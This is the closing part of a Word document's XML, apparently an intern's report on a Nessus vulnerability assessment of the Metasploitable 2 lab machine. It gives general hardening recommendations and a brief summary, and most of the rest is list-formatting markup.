          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Implement strong authentication mechanisms, such as two-factor authentication, to secure remote access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F85955" w:rsidRPr="00F85955" w:rsidRDefault="00F85955" w:rsidP="00F85955">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F85955">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Conduct periodic vulnerability assessments and penetration tests to identify and address new vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F85955" w:rsidRPr="00F85955" w:rsidRDefault="00F85955" w:rsidP="00F85955">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F85955">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Follow security best practices, such as disabling unnecessary services, enforcing strong passwords, and using encryption where appropriate.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F85955" w:rsidRPr="00F85955" w:rsidRDefault="00F85955" w:rsidP="00F85955">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F85955">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>By implementing these recommendations and maintaining an ongoing security monitoring and maintenance program, the overall security of Metasploitable 2 can be significantly improved, reducing the risk of exploitation and unauthorized access.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F85955">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D55DE4" w:rsidRPr="009305D1" w:rsidRDefault="00D55DE4" w:rsidP="009305D1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006F2646" w:rsidRPr="006F2646" w:rsidRDefault="006F2646" w:rsidP="009305D1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F2646">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Summary: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083099E" w:rsidRDefault="006F2646" w:rsidP="009305D1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="009305D1" w:rsidRPr="009305D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">conducting a vulnerability assessment of Metasploitable 2 using Nessus, you can identify vulnerabilities in the target system. The scan results will provide details such as the specific vulnerabilities, their severity levels (e.g., high, medium, low), and potential impacts on the security of the system. It is crucial to prioritize and address high and critical severity vulnerabilities first, as they can potentially lead to unauthorized access, data breaches, or other security compromises. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083099E" w:rsidRPr="0083099E" w:rsidRDefault="0083099E" w:rsidP="0083099E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0083099E" w:rsidRDefault="0083099E" w:rsidP="0083099E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>NAME: SHREYA SHREE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083099E" w:rsidRDefault="0083099E" w:rsidP="0083099E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SENSELEARNER</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083099E" w:rsidRDefault="0083099E" w:rsidP="0083099E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CYBERSECURITY INTERN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083099E" w:rsidRPr="0083099E" w:rsidRDefault="0083099E" w:rsidP="0083099E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>10/07/23</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083099E" w:rsidRPr="0083099E" w:rsidRDefault="0083099E" w:rsidP="0083099E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0083099E" w:rsidRDefault="0083099E" w:rsidP="0083099E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A74538" w:rsidRPr="0083099E" w:rsidRDefault="0083099E" w:rsidP="0083099E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3276"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>THANKYOU</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00A74538" w:rsidRPr="0083099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6E0" w:rsidRDefault="003216E0" w:rsidP="00725829">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="003216E0" w:rsidRDefault="003216E0" w:rsidP="00725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6E0" w:rsidRDefault="003216E0" w:rsidP="00725829">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="003216E0" w:rsidRDefault="003216E0" w:rsidP="00725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070A8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DE0E8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96F09"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1690D2D8"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440" w:hanging="144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2160"/>
        </w:tabs>
        <w:ind w:left="2160" w:hanging="2160"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2520"/>
        </w:tabs>
        <w:ind w:left="2520" w:hanging="2520"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8.%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="2880" w:hanging="2880"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2">
    <w:nsid w:val="0ABF6E65"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CA2C7C36"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="510"/>
        </w:tabs>
        <w:ind w:left="510" w:hanging="51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80"/>
        </w:tabs>
        <w:ind w:left="1080" w:hanging="1080"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440" w:hanging="144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2160"/>
        </w:tabs>
        <w:ind w:left="2160" w:hanging="2160"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2520"/>
        </w:tabs>
        <w:ind w:left="2520" w:hanging="2520"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8.%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="2880" w:hanging="2880"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3">
    <w:nsid w:val="0F8D3FF7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="43D6F9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18696C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5D364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BB5988"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E7FE9A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CE2FE0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="43B62746"/>
    <w:lvl w:ilvl="0" w:tplc="0409000D">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1176" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">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7">
    <w:nsid w:val="1BF4123D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4552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360259"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BFA48732"/>
    <w:lvl w:ilvl="0" w:tplc="B4D273D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3E4F25"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="75666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172E0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DF8EF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146DB9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EF9A8C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D13E84"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9A4E1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3C44D2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9B189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E97F94"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4900E0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E412B8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F73C5F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8F3514"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="33BE4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F72E4D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DFC874EA"/>
    <w:lvl w:ilvl="0" w:tplc="04090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1176" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">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18">
    <w:nsid w:val="2D711027"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A30468B2"/>
    <w:lvl w:ilvl="0" w:tplc="CA7451D4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="456" w:hanging="360"/>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19">
    <w:nsid w:val="2F3F3910"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E8709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213F51"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1038B5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520575E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A7B8CFC0"/>
    <w:lvl w:ilvl="0" w:tplc="75CEE7FE">
      <w:start w:val="3"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1536" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1896" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2616" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3336" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4056" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4776" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5496" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6216" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6936" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22">
    <w:nsid w:val="3A0B682C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F36E8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495606"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7242C470"/>
    <w:lvl w:ilvl="0" w:tplc="F83EF57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4">
    <w:nsid w:val="3DD41FD5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B1EE6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D72224"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E59C287C"/>
    <w:lvl w:ilvl="0" w:tplc="0409000D">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1176" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">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26">
    <w:nsid w:val="41FD382A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DA64C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9C141B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1C86A044"/>
    <w:lvl w:ilvl="0" w:tplc="39E0A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8606AF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FBB4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6672D2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E08A94BE"/>
    <w:lvl w:ilvl="0" w:tplc="D1AADE6C">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7D615E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="94E6D77A"/>
    <w:lvl w:ilvl="0" w:tplc="3CDC382E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="540" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:b/>
        <w:sz w:val="3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1">
    <w:nsid w:val="51073F71"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="358EF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D5108D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C610D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3C6577"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BEBA6738"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="3"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="495"/>
        </w:tabs>
        <w:ind w:left="495" w:hanging="495"/>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80"/>
        </w:tabs>
        <w:ind w:left="1080" w:hanging="1080"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440" w:hanging="144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2160"/>
        </w:tabs>
        <w:ind w:left="2160" w:hanging="2160"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2520"/>
        </w:tabs>
        <w:ind w:left="2520" w:hanging="2520"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8.%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="2880" w:hanging="2880"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="34">
    <w:nsid w:val="585926FA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="847CFF40"/>
    <w:lvl w:ilvl="0" w:tplc="477E0C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9501FEE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="03F2C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2611A3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6456B330"/>
    <w:lvl w:ilvl="0" w:tplc="70E8D86C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="816"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abstractNum w:abstractNumId="37">
    <w:nsid w:val="5B2D23E9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="32BEFFD0"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="3"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman" w:hint="default"/>
        <w:b w:val="0"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>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8">
    <w:nsid w:val="5C126977"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="95A67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CDF1A6B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="196EE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0156110"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9F3C2C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nsid w:val="6B6D09C7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
